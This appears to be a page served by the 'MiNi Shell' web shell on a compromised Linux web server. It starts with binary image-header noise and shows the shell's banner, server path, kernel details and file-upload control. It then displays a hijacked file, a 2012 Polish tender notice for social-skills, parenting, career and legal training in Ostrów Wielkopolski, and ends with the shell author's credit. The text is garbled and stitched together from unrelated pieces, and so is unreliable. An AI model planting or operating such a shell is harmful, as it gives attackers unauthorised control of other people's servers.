JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120810/297214-N-2012.html

<p class="kh_header"><b>Ostrów Wielkopolski: Przygotowanie i przeprowadzenie szkoleń i kursów: zastosowanie usług z zakresu podniesienia kompetencji życiowych i prawidłowego pełnienia ról społecznych przeprowadzonych przez psychologa, poradnictwa pedagogicznego w zakresie prawidłowego określenia i wypełniania relacji rodzic - dziecko, wspierających aktywizację zawodową w postaci treningu i spotkań z doradcą zawodowym oraz poradnictwa prawnego w zakresie Kodeksu Pracy i Kodeksu rodzinnego i opiekuńczego.</b><br>
<b>Numer ogłoszenia: 297214 - 2012; data zamieszczenia: 10.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Limanowskiego 17, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5921122 w. 244, faks 062 5921216.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie szkoleń i kursów: zastosowanie usług z zakresu podniesienia kompetencji życiowych i prawidłowego pełnienia ról społecznych przeprowadzonych przez psychologa, poradnictwa pedagogicznego w zakresie prawidłowego określenia i wypełniania relacji rodzic - dziecko, wspierających aktywizację zawodową w postaci treningu i spotkań z doradcą zawodowym oraz poradnictwa prawnego w zakresie Kodeksu Pracy i Kodeksu rodzinnego i opiekuńczego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zastosowanie usług z zakresu podniesienia kompetencji życiowych i prawidłowego pełnienia ról społecznych przeprowadzonych przez psychologa:
Ilość osób - 150 
Zajęcia liczone w godzinach zegarowych
zajęcia grupowe - planowane są 2 spotkania 5 godzin (godzinny zegarowe). dla jednej grupy, uczestnicy zostaną podzieleni na 7 grup.  5 grup będzie liczyło 20 os. i 2 grupy będą  po 25 os.
Łączna liczba godzin wynosi 70 godzin zegarowych, 10 godzin zajęć planowane jest na jednej grupy 
Miejsce szkolenia - sale wykładową zapewnia Wykonawca na terenie miasta Ostrowa Wlkp. 
Termin realizacji: od sierpień do 15 grudnia 2012 rok
Zapewnienie Sali dydaktycznej wyposażonej w niezbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie. Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia (rzutnik flipchart, krzesła stoły) oraz materiały szkoleniowe w formie papierowej i/lub CD. Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL.
Wykonawca zobowiązany jest do wykonania usługi, zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 2003r.) i p. póź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego.
 W cenie szkolenia: zapewnienie cateringu na zajęciach grupowych: - w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) oraz zapewnienie ciepłego posiłku - obiad jednodaniowy.
Cel treningu/spotkań - zakres tematyczny treningów: Cel spotkań oraz program zajęć diagnoza          i ocena potencjału zainteresowań, wzmocnienie samooceny, kształtowanie właściwych postaw wobec pracy, zwiększenie motywacji do działania. W ramach programu omówienie komunikacji interpersonalnej z elementami negocjacji, zarządzanie czasem i organizacją pracy, ćwiczenie postaw i zachowań asertywnych - asertywność w pracy, umiejętność autoprezentacji, sposoby na redukcję i odreagowanie stresu,
W cenie szkolenia: zapewnienie materiałów szkoleniowych ( 1 egzemplarza materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu), wydanie zaświadczenia/certyfikatu o ukończeniu szkolenia, kserokopia zaświadczenia zostanie przekazana koordynatorowi projektu, zaświadczenia/certyfikaty zostaną oznaczone zgodnie z Wytycznymi POKL, przeprowadzenie na zakończenie szkolenia ankiety ewaluacyjnej i przekazanie dokumentacji koordynatorowi projektu, sporządzenie harmonogramu spotkań grupowych, prowadzenie listy obecności Beneficjentów na zajęciach - podpisy uczestników, każda lista obecności potwierdzona zostanie przez wykładowcę - podpis wykładowcy. Udokumentowanie odbytych zajęć w formie zdj. ze szkolenia.

2. Zastosowanie usług poradnictwa pedagogicznego w zakresie prawidłowego określenia               i   wypełniania relacji rodzic - dziecko
Ilość osób łącznie - 150
Zajęcia liczone w godzinach zegarowych
zajęcia grupowe - planowane są 2 spotkania 5 godzinne (godz. zegarowa). dla jednej grupy, uczestnicy zostaną podzieleni na 7 grup.  5 grup będzie liczyło 20 os. i 2 grupy będą  po 25 os.
Łączna liczba godzin wynosi 70 godzin zegarowych, 10 godzin zajęć planowane jest dla jednej grupy. 
zajęcia indywidualne - planowane jest 1 spotkanie godzinne (godz. zegarowa) dla 16 os.- rodzin, prowadzący sporządzi opinie/notatkę ze spotkania indywidualnego
Miejsce szkolenia - sale wykładową zapewnia Wykonawca na terenie miasta Ostrowa Wlkp.
Termin: od sierpnia do15 grudnia 2012 roku
Zapewnienie Sali dydaktycznej wyposażonej w nie zbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie. Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia (rzutnik flipchart, krzesła stoły) oraz materiały szkoleniowe w formie papierowej i/lub CD. Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL
Wykonawca zobowiązany jest do wykonania usługi, zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 2003r.) i p. póź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego.
W cenie szkolenia: zapewnienie cateringu na zajęciach grupowych: - w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) oraz zapewnienie ciepłego posiłku - obiad. 
Cel treningu/spotkań oraz zakres tematyczny treningów - z możliwością podania propozycji dodatkowych: zajęcia integracyjne, świadomość własnych celów wychowawczych, rozpoznawanie, wyrażanie i akceptowanie uczuć dziecka, wspieranie i poznawanie uczuć własnych i dziecka, nawiązywanie współpracy z dzieckiem, wyrażanie wymagań i ograniczeń wobec dziecka, motywowanie dziecka do współdziałania, aktywne i wspierające słuchanie dziecka, rola matki i ojca w wychowaniu, reguły wychowania jak je ustalać i egzekwować.
W cenie szkolenia: zapewnienie materiałów szkoleniowych ( 1 egzemplarza materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu), opinia/notatka ze spotkania indywidualnego zostanie przekazana koordynatorowi projektu wraz z dokumentacją, jeśli podczas spotkania będą wykorzystywane testy lub inne materiały również one zostaną potwierdzone przez prowadzącego i przekazane koordynatorowi projektu, wydanie zaświadczenia/certyfikatu o ukończeniu szkolenia, kserokopia zaświadczenia zostanie przekazana koordynatorowi projektu, zaświadczenia/certyfikaty zostaną oznaczone zgodnie z Wytycznymi POKL, przeprowadzenie na zakończenie szkolenia ankiety ewaluacyjnej i przekazanie dokumentacji koordynatorowi projektu, sporządzenie harmonogramu spotkań grupowych, prowadzenie listy obecności Beneficjentów na zajęciach - podpisy uczestników, każda lista obecności potwierdzona zostanie przez wykładowcę- podpis wykładowcy. Udokumentowanie odbytych zajęć w formie zdj. ze szkolenia.

Zastosowanie usług wspierających aktywizację zawodową w postaci treningu i spotkań z doradcą zawodowym
Ilość osób - 150
Zajęcia liczone w godzinach zegarowych.
zajęcia grupowe - planowane są 2 spotkania 5 godzinne (godz. zegarowa). dla jednej grupy, uczestnicy zostaną podzieleni na 7 grup.  5 grup będzie liczyło 20 os. i 2 grupy będą  po 25 os.
Łączna liczba godzin wynosi 70 godzin zegarowych, 10 godzin zajęć planowane jest dla jednej grupy. 
zajęcia indywidualne  -  planowane są 2 spotkania indywidualne dla 1 uczestnika. Czas trwania jednego spotkania to 1 godzina zegarowa. Wykonawca sporządzi opinie/notatkę ze spotkania indywidualnego.
Miejsce szkolenia - sale wykładową zapewnia Wykonawca na terenie miasta Ostrowa Wlkp.
 Termin: od sierpień do15 grudnia 2012 rok.
Zapewnienie Sali dydaktycznej wyposażonej w nie zbędny sprzęt i urządzenia zapewniające bezpieczne szkolenie. Zapewnienie niezbędnego sprzętu umożliwiającego sprawne prowadzenie szkolenia (rzutnik flipchart, krzesła stoły) oraz materiały szkoleniowe w formie papierowej i/lub CD. Materiały szkoleniowe zostaną oznaczone zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach POKL
Wykonawca zobowiązany jest do wykonania usługi, zgodnie z ogólnymi przepisami BHP (Dz. U. Nr 169 z 2003r.) i p. póź. Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników kursów skierowanych przez Zamawiającego.
W cenie szkolenia: zapewnienie cateringu na zajęciach grupowych: - w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) oraz zapewnienie ciepłego posiłku - obiad jednodaniowy.
Cel treningu/spotkań - zakres tematyczny treningów: Zwiększenie motywacji do działania, nabycie wiedzy o rynku pracy oraz mechanizmach jego funkcjonowania, poprawne przygotowanie dokumentów aplikacyjnych w poszukiwaniu pracy, przygotowanie do rozmowy kwalifikacyjnej (przykładowy plan wypowiedzi kandydata do pracy), nauka autoprezentacji, komunikacja werbalna i niewerbalna.
W cenie szkolenia: zapewnienie materiałów szkoleniowych ( 1 egzemplarza materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu), opinia/notatka ze spotkania indywidualnego zostanie przekazana koordynatorowi projektu wraz z dokumentacją, jeśli podczas spotkania będą wykorzystywane testy lub inne materiały również one zostaną potwierdzone przez prowadzącego i przekazane koordynatorowi projektu, wydanie zaświadczenia/certyfikatu o ukończeniu szkolenia, kserokopia zaświadczenia zostanie przekazana koordynatorowi projektu, zaświadczenia/certyfikaty zostaną oznaczone zgodnie z Wytycznymi POKL, przeprowadzenie na zakończenie szkolenia ankiety ewaluacyjnej i przekazanie dokumentacji koordynatorowi projektu, sporządzenie harmonogramu spotkań grupowych, prowadzenie listy obecności Beneficjentów na zajęciach - podpisy uczestników, każda lista obecności potwierdzona zostanie przez wykładowcę- podpis wykładowcy. Udokumentowanie odbytych zajęć w formie zdj. ze szkolenia.

Zastosowanie usług poradnictwa prawnego w zakresie Kodeksu Pracy i Kodeksu rodzinnego i opiekuńczego
Ilość osób - 150
Zajęcia liczone w godzinach zegarowych. 
zajęcia grupowe - planowane jest 1 spotkania 5 godzinne (godz. zegarowa). dla jednej grupy, uczestnicy zostaną podzieleni na 8 grup. Sześć grup będzie liczyło 20 os. (6 grupx20 osób=120 os., 2 grup. X 15 os.= 30 os. 120+30=150 - uczestników). 
Łączna liczba godzin wynosi 40 godzin zegarowych, 5 godzin zajęć dla jednej grupy               (8 grup.x5 godz.=40 godz.)
Miejsce szkolenia - na terenie miasta Ostrowa Wlkp. (MOPS - siedziba Zamawiającego),
Usługę cateringowa - w postaci przerwy kawowej (kawa, herbata, zimne napoje, ciasto) na zajęcia z radca prawnym zapewnia Zamawiający - MOPS
Termin: od sierpnia - 15 grudnia 2012 roku
Cel treningu/spotkań: Zwiększenie wiedzy z zakresu prawa pracy - ogólne wiadomości o prawie pracy, charakter prawny stosunku pracy( rodzaje umów o pracę, prawa i obowiązki pracodawcy, prawa i obowiązki pracownika, rozwiązanie i wygaśnięcie stosunku pracy), wynagrodzenie za pracę oraz inne świadczenia związane z pracą, omówienie kwestii ubezpieczenia, kwestii urlopów. Omówienie zagadnienia związanych z czasem pracy. Informacje na temat prowadzenia                   i zarejestrowania własnej działalności gospodarczej. Podstawowe pojęcia z zakresu Kodeksu rodzinnego, małżeńskie ustroje majątkowe (ustawowy ustrój majątkowy, umowny ustrój majątkowy, przymusowy ustrój majątkowy), obowiązek alimentacyjny (pytania od beneficjentów).
W cenie szkolenia: zapewnienie materiałów szkoleniowych ( 1 egzemplarza materiałów szk. popisany przez os. upoważnioną zostanie przekazany koordynatorowi projektu), wydanie zaświadczenia/certyfikatu o ukończeniu szkolenia, kserokopia zaświadczenia zostanie przekazana koordynatorowi projektu, zaświadczenia/certyfikaty zostaną oznaczone zgodnie z Wytycznymi POKL, przeprowadzenie na zakończenie szkolenia ankiety ewaluacyjnej i przekazanie dokumentacji koordynatorowi projektu, sporządzenie harmonogramu spotkań grupowych, prowadzenie listy obecności Beneficjentów na zajęciach - podpisy uczestników, każda lista obecności potwierdzona zostanie przez wykładowcę- podpis wykładowcy. Udokumentowanie odbytych zajęć w formie zdj. ze szkolenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	wykonawca ubiegający się o udzielenie zamówienia musi dysponować: a) przynajmniej jedną osobą szkolącą, która ma ukończone studia wyższe na kierunku psychologii, socjologii lub pedagogiki do prowadzenia zajęć grupowych oraz ukończone studia wyższe na kierunku psychologii do prowadzenia sesji indywidualnych, b) przynajmniej jedną osobą szkolącą która ma ukończone studia wyższe na kierunku psychologii lub pedagogiki do prowadzenie zajęć grupowych i indywidualnych, c) przynajmniej jedną osobą, która ukończyła studia wyższe i jednocześnie dysponuje Licencją zawodową doradcy zawodowego, d) przynajmniej jedną osobą, która ukończyła studia wyższe na Wydziale Prawa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony i podpisany formularz ofertowy ; oświadczenie Wykonawcy wskazujące, która część zamówienia zostanie powierzona Podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ostrow-wielkopolski.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Ostrowie Wielkopolskim Adres: ul. Limanowskiego 17, 62-400 Ostrów Wielkopolski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Ostrowie Wielkopolskim Adres: ul. Limanowskiego 17, 62-400 Ostrów Wielkopolski bezwzględnie sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przygotowanie i przeprowadzenie szkoleń i kursów przewidzianych w projekcie pt. Udział w projekcie szansą na lepsze jutro w mieście Ostrów Wielkopolski realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com